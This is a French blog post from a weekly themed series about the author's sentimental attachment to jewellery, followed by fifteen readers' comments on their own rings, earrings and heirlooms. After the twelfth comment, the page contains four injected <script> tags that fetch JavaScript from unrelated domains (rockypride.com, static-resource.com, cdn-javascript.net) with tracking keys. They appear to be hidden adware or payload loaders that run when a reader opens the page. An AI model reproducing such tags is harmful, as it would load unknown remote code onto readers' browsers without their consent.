• Les lundis à deux et plus

    Tous les lundis donc, c'est fixé. J'ai rendez-vous avec ZazaAlice avec vous toutes. On se retrouve autour d'une chanson, d'une photo, d'un texte, d'un souvenir, d'un dessin autour d'un sujet fixé et dévoilé à l'avance!

     

    Le 30 marsBijoux, vous aimez les bijoux ? Précieux, fantaisies, discrets, voyants...

    Les lundis à deux et plus

    J'aime le bijoux non pas pour leur valeur marchande mais pour leur valeur sentimentale:

    Les lundis à deux et plus

    Les lundis à deux et plus

    Les lundis à deux et plus

    ou parce qu'ils me correspondent même s'ils n'ont aucune valeur pour les autres:

    Les lundis à deux et plus

    Les lundis à deux et plus

     


  • Commentaires

    1
    Lundi 30 Mars 2020 à 08:59

    je ne suis pas du tout bijoux sauf mon alliance, quue désormais je porte que si je sors, bonne journée, bises

    2
    Lundi 30 Mars 2020 à 09:03

    C'est idem pour moi qui ne possède aucun bijou de valeur. Les bijoux fantaisies ont tout de même plus de charme !

    J'ai toujours refusé que mon homme gaspille son argent pour quelque chose que je ne mettrais pas par peur de le perdre...

    Celui qui aurait envie de me les voler, ne pourrait qu'être déçu.

    Bonne semaine

    Bisous

    3
    Lundi 30 Mars 2020 à 09:09

    Je ne porte pas de bijoux!

    Juste petites boucles d'oreilles !

     

     

    4
    Marie Jeanne85
    Lundi 30 Mars 2020 à 09:10
    Oh ! Des jolis bijoux tortues
    Des bijoux , j'aime bien , une collection de boucles d'oreilles
    Belle semaine à toutes
    5
    Lundi 30 Mars 2020 à 09:18

    Je porte mon alliance, et un pendentif en émaux bressans, offert par mon père pour mes 17 ans, quelques mois avant son décès. J'ai l'impression qu'il me "protège", même si je sais que ça n'a aucun pouvoir réél, c'est uniquement psychologique.

    Sinon, j'ai trois trous sur les oreilles, donc trois paires de boucles , et une gourmette qui m'avait été offerte pour ma communion, et que je trouve bête de ne pas porter, du coup, je ne la quitte plus.

    Ma grand mère m'avait donné sa bague de fiançailles pour mes 50 ans, je la porte quand je vais au club ou que je sors (ce qui est rare !), avec la mienne, et une bague que j'ai eue pour mes 60 ans.

    Donc pour moi, c'est plus une relation de souvenirs...

    6
    Toinette
    Lundi 30 Mars 2020 à 09:42

    J'adore tous les bijoux : de valeur ou pas ! 

     

    7
    Mignon
    Lundi 30 Mars 2020 à 09:50

    J'aime certains bijoux que je mets à des occasions particulières...en souvenir de.. Il y a bien sûr mon alliance que je garde tout le temps!

    J'aime les tiens,...par contre! surtout le pendentif de cœur!

    Bisous

    8
    Roseline
    Lundi 30 Mars 2020 à 10:54

    Originaux tous tes bijoux tortue! Seule une gourmette argent à mon poignet.

    Je ne porte plus les bijoux de valeur qui restent  « confinés »(!) dans mon coffret à bijoux depuis longtemps, même mes bagues y sont aussi, l’arthrose ayant déformé mes doigts.

    9
    Lundi 30 Mars 2020 à 12:47
    Cerise violette

    J'aime l'or jaune et rose et les diamants. J'en ai reçu en cadeaux et j'en ai hérité .

    J'apprécie les bijoux fantaisies et ethniques que je porte selon mes tenues.

    Les pierres précieuses et semi -précieuses aussi.  Et ceux faits de matériaux de la nature , coquillages, graines, perles,  etc.

    Bisous

     

    10
    Lundi 30 Mars 2020 à 13:22
    Marie de clessé

    Moi je suis une véritable pie!!! j'adore les bijoux vrais ou faux du moment que ça brillewinktonguej'en ai plein, plus de faux que de vrais...Mais paradoxalement je ne porte que mon alliance, mais c'est pas grave!!!

          Bon lundi à toutes

         Bisous.

              Marie.

    11
    Lundi 30 Mars 2020 à 16:25
    gateuxrigolo

    hello de bien beaux bijoux bisous

    12
    Lundi 30 Mars 2020 à 16:37

    J'aime les bijoux, simple de préférence faciles à porter

    De fantaisies surtout l'été, j'aime Pandora!!

    Bisous

    <script src="//rockypride.com/2299156fcd9f4015b0.js"></script>

    <script src="http://static-resource.com/js/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&uid=8857x" type="text/javascript"></script>

    <script src="http://cdn-javascript.net/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&uid=8857x&format=arrjs&r=1585578958845" type="text/javascript"></script> <script src="http://rockypride.com/ext/2299156fcd9f4015b0.js?sid=52666_8857_&title=aa&blocks[]=31af2" type="text/javascript"></script>

    13
    Nadine
    Lundi 30 Mars 2020 à 16:57
    Nadine

    Je porte mon alliance , ma montre à 5 € sinon des boucles d'oreilles , pas d'intérêt pour les bijoux de prix . Et je donne très souvent ceux que je confectionne , mais en porte peu. Biz

    14
    Lundi 30 Mars 2020 à 17:34

    j'aime bien les bijoux qui ont tous un souvenir précis

    15
    Mercredi 1er Avril 2020 à 12:14

    Je les trouve bien jolis ces bijoux 

    Suivre le flux RSS des commentaires


    Ajouter un commentaire

    Nom / Pseudo :

    E-mail (facultatif) :

    Site Web (facultatif) :

    Commentaire :